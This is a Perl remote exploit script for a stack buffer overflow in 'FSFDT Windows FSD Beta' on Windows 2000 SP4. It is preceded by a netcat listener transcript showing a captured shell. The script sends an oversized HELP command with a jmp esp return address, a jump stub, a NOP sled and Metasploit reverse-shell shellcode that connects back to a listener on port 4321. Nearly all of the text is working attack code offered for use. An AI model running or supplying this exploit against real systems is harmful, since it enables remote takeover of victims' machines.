# ~$ nc -l -p 4321 # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # E:\draft\fsd1110\windows>_ # # ------------------------------------------- #!/usr/bin/perl # FSFDT remote exploit by weak[at]fraglab.at # spawns reverse shell to 10.0.0.100:4321 # tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4 use IO::Socket; if( $#ARGV < 1 ) { print "usage: perl ".$0." "; exit(); } my $ip = $ARGV[0]; my $port = $ARGV[1]; print "connecting...\n"; my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', ); die "could not create socket: $!\n" unless $sock; # jmp esp in KERNEL32.DLL 5.0.2195.7006 my $jmpesp = "\xB7\x49\xE7\x77"; # encoded 'jmp 0x400' to jump to stage2 my $jmpcode = "\xeb\x11\x5e\x31\xc9\xb1\x1e\x80\x6c\x0e\xff\x35\x80\xe9\x01". "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x0e\x16\x0e\x69\x59\x8d". "\x8d\x8d\x8d\xb5\x1d\x1c\x66\xfe\x9b\xb6\x1e\x30\x34\xb5\x65". "\x36\x75\x17\x2f\x1d\x36\x3a\x36\x36"; # win32_reverse - EXITFUNC=thread LHOST=10.0.0.2 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com # bad chars: 0x00 0x0A 0x0D 0x20 0x29 my $shellcode = "\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e". "\x2a\x6e\x8f\x83\xeb\xfc\xe2\xf4\xe2\x40\x85\xc2\xf6\xd3\x91\x70". "\xe1\x4a\xe5\xe3\x3a\x0e\xe5\xca\x22\xa1\x12\x8a\x66\x2b\x81\x04". "\x51\x32\xe5\xd0\x3e\x2b\x85\xc6\x95\x1e\xe5\x8e\xf0\x1b\xae\x16". "\xb2\xae\xae\xfb\x19\xeb\xa4\x82\x1f\xe8\x85\x7b\x25\x7e\x4a\xa7". "\x6b\xcf\xe5\xd0\x3a\x2b\x85\xe9\x95\x26\x25\x04\x41\x36\x6f\x64". "\x1d\x06\xe5\x06\x72\x0e\x72\xee\xdd\x1b\xb5\xeb\x95\x69\x5e\x04". "\x5e\x26\xe5\xff\x02\x87\xe5\xcf\x16\x74\x06\x01\x50\x24\x82\xdf". "\xe1\xfc\x08\xdc\x78\x42\x5d\xbd\x76\x5d\x1d\xbd\x41\x7e\x91\x5f". "\x76\xe1\x83\x73\x25\x7a\x91\x59\x41\xa3\x8b\xe9\x9f\xc7\x66\x8d". "\x4b\x40\x6c\x70\xce\x42\xb7\x86\xeb\x87\x39\x70\xc8\x79\x3d\xdc". "\x4d\x69\x3d\xcc\x4d\xd5\xbe\xe7\x14\x2a\x6e\xeb\x78\x42\x7e\x6e". "\x78\x79\xe7\x6e\x8b\x42\x82\x76\xb4\x4a\x39\x70\xc8\x40\x7e\xde". "\x4b\xd5\xbe\xe9\x74\x4e\x08\xe7\x7d\x47\x04\xdf\x47\x03\xa2\x06". "\xf9\x40\x2a\x06\xfc\x1b\xae\x7c\xb4\xbf\xe7\x72\xe0\x68\x43\x71". "\x5c\x06\xe3\xf5\x26\x81\xc5\x24\x76\x58\x90\x3c\x08\xd5\x1b\xa7". "\xe1\xfc\x35\xd8\x4c\x7b\x3f\xde\x74\x2b\x3f\xde\x4b\x7b\x91\x5f". "\x76\x87\xb7\x8a\xd0\x79\x91\x59\x74\xd5\x91\xb8\xe1\xfa\x06\x68". "\x67\xec\x17\x70\x6b\x2e\x91\x59\xe1\x5d\x92\x70\xce\x42\x81\x41". "\xfe\x4a\x3d\x70\xc8\xd5\xbe\x8f"; print "sending payload...\n"; print $sock "HELP " . "A"x200 . $jmpesp . "\x90"x8 . $jmpcode . "\n" . "\x90"x400 . $shellcode; close($sock); print "done.\n";